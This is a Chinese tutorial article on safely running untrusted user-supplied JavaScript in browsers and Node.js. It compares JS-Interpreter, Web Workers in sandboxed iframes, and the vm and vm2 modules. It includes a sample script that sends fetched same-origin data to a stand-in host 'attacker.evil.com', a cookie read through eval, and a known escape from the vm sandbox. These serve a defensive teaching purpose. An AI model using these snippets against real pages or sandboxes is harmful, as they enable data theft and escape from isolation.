zoukankan      html  css  js  c++  java
  • 如何安全地运行用户的 JavaScript 脚本

    本文来自网易云社区,转载务必请注明出处。



    有时候我们需要运行用户输入的 JavaScript 脚本(以下简称脚本)。对于我们来说,这些脚本是不可信任的,如果在当前的 Context 中运行这些脚本,它们就能获取到像 cookie、localStorage、DOM 元素等隐私数据,会有潜在的安全问题。

    本文所说的用户脚本,是指用户在文本框中输入的 JavaScript 代码,也就是一些代码字符串,我们假设它们只需要做一些计算,不需要访问用户数据。

    下面我们来看一下如何在浏览器和 Node.js 中安全地运行上述这种不可信任的用户脚本。

    浏览器

    eval 和 new Function 这两个方法会在当前的 Context 中运行,它们可以访问 cookie 等隐私数据,所以不能使用这两个方法:

    const cookie = eval('document.cookie');const getCookie = new Function('return document.cookie');

    这里需要强调下,是因为eval 和 new Function 能访问 cookie 等隐私数据所以才不能使用它们,并不是因为它们在当前的 Context 中运行而不能使用它们,如果它们在当前的 Context 中运行,但不能访问任何隐私数据,也是可以放心地使用它们的。

    所以,我们要将用户脚本放到沙箱(Sandbox)中去运行,同时不能让它们访问任何用户数据,比如 cookie、localStorage、JavaScript 全局变量、DOM 元素等。

    解释器

    一种方案是使用 JavaScript 解释器,比如 JS-Interpreter。我们来看一下 JS-Interpreter 的用法,首先在页面中引入 acorn_interpreter.js 这个文件,然后可以按照下面的形式使用:

    const code = '1 + 2';const interpreter = new Interpreter(code);
    interpreter.run();console.log(interpreter.value); // 3

    下面来验证一下是否能访问用户数据:

    const globalVar = 'x';const code = 'globalVar';const interpreter = new Interpreter(code);
    interpreter.run();console.log(interpreter.value); // globalVar is not defined

    globalVar 是一个全局变量,用户脚本无法访问这个全局变量。同时不难验证,cookielocalStoragedocumentXMLHttpRequest 等对象用户脚本都是无法访问的,不过有 window 对象,虽然和浏览器中的 window 不是同个对象。

    注意,上述代码只是在论证用户脚本的能力,并不是在讨论 JS-Interpreter 本身能做什么事情,JS-Interpreter 可以通过 createNativeFunction 等方法去调用系统方法,运行下面的代码后,会弹窗显示当前页面的 URL 地址:

    var myCode = 'alert(url);';var initFunc = function (interpreter, scope) {
      interpreter.setProperty(scope, 'url', String(location));  var wrapper = function (text) {    return alert(text);
      };
      interpreter.setProperty(scope, 'alert',
        interpreter.createNativeFunction(wrapper));
    };var myInterpreter = new Interpreter(myCode, initFunc);
    myInterpreter.run();

    据官方文档说明,JS-Interpreter 目前还未收到安全漏洞问题,但有以下使用限制:

    • 不能访问 DOM。

    • 不支持 ES6,只支持 ES5。

    • 不支持自定义的 toString 和 valueOf 方法。

    • 性能比原生的低 200 倍左右。

    如果上述限制对要实现的功能没有影响,对引入额外文件的成本也可以忽略的话,我觉得是值得尝试使用的。

    Web Worker

    另外一种是使用 Web Worker,也有相应的封装实现,比如这个库 jailed,它在 Node.js 和浏览器中都可以使用,不过在 Node.js 中的实现有安全问题,就不具体介绍了。在浏览器中,它的做法是:

    我们先来看一下如何使用 Web Worker 来运行用户脚本。根据 Worker 的文档,第一个参数是脚本的地址。但我们今天讨论的问题是用户输入的脚本代码,它是一段字符串,并不是一个文件。所以需要想办法将字符串代码转换成文件,使用 Blob 就可以了:

    <script id="worker" type="javascript/worker">
      self.onmessage = function(e) {    console.log(`data from parent: ${e.data}`);    const result = eval(e.data);
        self.postMessage(`data from worker: ${result}`);
      };</script><script>
      const blob = new Blob([    document.querySelector('#worker').textContent
      ]);  const worker = new Worker(window.URL.createObjectURL(blob));
      worker.onmessage = function(e) {    console.log(`${e.data}`);
      };  // 发送用户脚本,这里是 `1 + 2`
      worker.postMessage(`1 + 2;`);</script>

    上面的示例,我们为了要运行用户脚本 1 + 2,把它传给了 Worker,然后在 Worker 中使用 eval 方法求值,所以现在的安全问题已经转嫁给 Worker 了。在 Worker 中,可以使用fetchXMLHttpRequest等对象,这会有潜在的安全问题,比如攻击者在用户脚本中请求当前域的数据,然后再发送给攻击者的服务器:

    // 将上面的用户脚本 `1 + 2` 换成下面的脚本fetch('secure.json')
    .then(function(response) {  return response.json();
    })
    .then(function(json) {
      importScripts('https://attacker.evil.com/' + JSON.stringify(json));
    });

    因此,需要将 Worker 放到 iframe 中,并将 iframe 的 sandbox 属性设置为 allow-scripts,也就是只允许执行脚本,本域的资源也不能加载:

    <!-- 将上面的 worker 代码放在 iframe.html 页面中 --><iframe src="iframe.html" sandbox="allow-scripts"></iframe>

    此外,还要防止用户代码中出现计算量过大或者死循环等问题,它们会导致用户的浏览器被卡死。Worker 本身并没有超时这样的参数,不过它有一个 terminate 方法可以用来结束它的运行,所以可以使用一个计时器,在指定的时间内如果主线程没有收到数据,就认为可以结束 Worker 的运行了,至于没有收到数据的原因,可能是用户脚本中出现了死循环、语法错误等原因:

    const blob = new Blob([  document.querySelector('#worker').textContent
    ]);const worker = new Worker(window.URL.createObjectURL(blob));let receivedFromWorker = false;
    worker.onmessage = function(e) {
      receivedFromWorker = true;  console.log(`${e.data}`);
    };
    worker.postMessage(`  while(true) {    console.log(1);
      }
    `);
    setTimeout(function () {  if (!receivedFromWorker) {    console.log('运行时间过长,结束 Worker');
        worker.terminate();
      }
    }, 100);

    Worker 是浏览器原生支持的,不需要引入额外的文件,是优先推荐使用的方法。

    Node.js

    在 Node.js 中,eval 和 new Function 这两个方法也是在当前的 Context 中运行,所以也不能使用这两个方法:

    eval('process.exit(0)');

    和在浏览器中一样,也需要把代码放到隔离的沙箱中去运行。

    VM

    Node.js 有一个 vm 模块,它可以在 V8 虚拟机中编译和执行代码,它是和当前执行环境隔离的沙箱环境,其中没有 processconsolefs 等全局对象:

    const vm = require('vm');let result = vm.runInNewContext('1 + 2');console.log(result); // 3// ReferenceError: process is not definedvm.runInNewContext('process.exit(0)');

    也可以指定超时执行时间:

    const vm = require('vm');// Error: Script execution timed out.vm.runInNewContext(`while (true) 1`, {}, {timeout: 3});

    那是否就可以直接使用这个 vm 模块来执行不可信任的用户脚本呢?很遗憾,不可以。官方文档中也明确地强调不能这么做:

    The vm module is not a security mechanism. Do not use it to run untrusted code.vm 模块的机制不安全,别用它来运行不可信任的代码。

    下面这个例子可以说明问题:

    const vm = require('vm');
    vm.runInNewContext('this.constructor.constructor("return process")().exit()');console.log('Never gets executed.');

    VM2

    由于 vm 存在的一些问题,有人写了一个 vm 的进化版本,叫 vm2,上面的例子是可以解决了:

    const {VM} = require('vm2');// ReferenceError: process is not definednew VM().run('this.constructor.constructor("return process")().exit()');

    vm2 内部也是调用了 vm,它使用了 Proxy 来防止访问沙箱外的东西,并且覆写了内置的 require 命令,对一些内置对象做了访问限制。

    但我们不能认为它是绝对安全的,比如从这个issue我们可以看出 vm2 本身也是不断地在进化中。目前没有发现安全问题并不能说明不存在安全问题。

    小结

    到目前为止,不管是浏览器还是 Node.js,都没有官方推出的功能,可以保证安全地执行不可信任的用户脚本。但都有一些相应的方案,可以有条件地使用。

    安全问题从来不可忽视,因为没人可以保证他写出来的代码没有 bug。



    本文来自网易云社区 ,经作者包勇明授权发布。

    网易云免费体验馆,0成本体验20+款云产品!

    更多网易研发、产品、运营经验分享请访问网易云社区


    相关文章:
    【推荐】 #3.14Piday#我的圆周率日
    【推荐】 SpringBoot入门(三)——入口类解析

  • 相关阅读:
    python实现从文件夹随机拷贝出指定数量文件到目标文件夹
    keras训练函数fit和fit_generator对比,图像生成器ImageDataGenerator数据增强
    Tensorflow与Keras自适应使用显存
    python创建DataFrame,并实现DataFrame的转置
    git push和pull如何解决冲突!!!精品
    lsomap降维
    python变量拷贝
    TSNE-图像二分类可视化
    用清华源安装模块
    HDU多校Round 8
  • 原文地址:https://www.cnblogs.com/zyfd/p/9766555.html
Copyright © 2011-2022 走看看